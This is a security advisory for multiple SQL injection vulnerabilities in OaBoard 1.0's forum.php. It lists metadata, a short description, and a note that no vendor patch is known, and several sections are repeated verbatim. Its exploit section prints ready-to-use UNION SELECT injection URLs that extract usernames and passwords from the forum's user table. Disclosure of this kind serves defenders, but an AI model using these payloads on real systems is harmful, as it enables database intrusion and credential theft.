OaBoard Forum.PHP Multiple SQL Injection Vulnerabilities
BID:15245
Info
OaBoard Forum.PHP Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 15245 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 31 2005 12:00AM |
| Updated: | Oct 31 2005 12:00AM |
| Credit: | [email protected] is credited with the discovery of this vulnerability. |
| Vulnerable: |
OaBoard OaBoard 1.0 |
| Not Vulnerable: | |
Discussion
OaBoard Forum.PHP Multiple SQL Injection Vulnerabilities
OaBoard is prone to multiple SQL injection vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input before using it in an SQL query.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
OaBoard is prone to multiple SQL injection vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input before using it in an SQL query.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
Exploit / POC
OaBoard Forum.PHP Multiple SQL Injection Vulnerabilities
No exploit is required.
Example URI have been provided:
http://www.example.com/oaboard/forum.php?modul=topics&channel=[SQL]
http://www.example.com/oaboard/forum.php?modul=topics&channel=-99%20UNION%20SELECT%20null,password%20FROM%20pw99_user%20WHERE%20id=1
http://www.example.com/oaboard/forum.php?modul=posting&topic=[SQL]&channel=3
http://www.example.com/oaboard/forum.php?modul=posting&topic=30%20UNION%20SELECT%20null,username,null,password%20FROM%20pw99_user%20WHERE%20id=1/*&channel=3
No exploit is required.
Example URI have been provided:
http://www.example.com/oaboard/forum.php?modul=topics&channel=[SQL]
http://www.example.com/oaboard/forum.php?modul=topics&channel=-99%20UNION%20SELECT%20null,password%20FROM%20pw99_user%20WHERE%20id=1
http://www.example.com/oaboard/forum.php?modul=posting&topic=[SQL]&channel=3
http://www.example.com/oaboard/forum.php?modul=posting&topic=30%20UNION%20SELECT%20null,username,null,password%20FROM%20pw99_user%20WHERE%20id=1/*&channel=3
Solution / Fix
OaBoard Forum.PHP Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
OaBoard Forum.PHP Multiple SQL Injection Vulnerabilities
References:
References:
- OaBoard Web Site (OaBoard)
- SQL IN FORUM.PHP ([email protected])